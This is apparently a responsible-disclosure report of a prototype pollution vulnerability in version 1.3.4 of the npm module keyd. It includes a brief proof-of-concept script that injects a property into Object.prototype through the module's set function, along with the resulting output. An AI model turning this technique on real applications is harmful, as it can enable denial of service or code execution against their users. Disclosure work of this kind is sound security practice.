I would like to report a prototype pollution
vulnerability in keyd
module.
It allows an attacker to inject properties on Object.prototype.
module name: keyd
version:1.3.4
npm page: https://www.npmjs.com/package/keyd
A small library for using and manipulating key paths in JavaScript.
[71] weekly downloads
The set
function can be used to add/modify properties of the Object prototype. These properties will be present on all objects.
keyd
module:
npm i keyd
Set the __proto__.polluted
property of an object:
const keyd = require('keyd');
const obj = {};
console.log("Before : " + obj.polluted);
keyd({}).set('__proto__.polluted', 'yes');
console.log("After : " + obj.polluted);
Output:
Before : undefined
After : yes
{F833532}
Thank you for your time.
best regards,
d3lla
The impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection.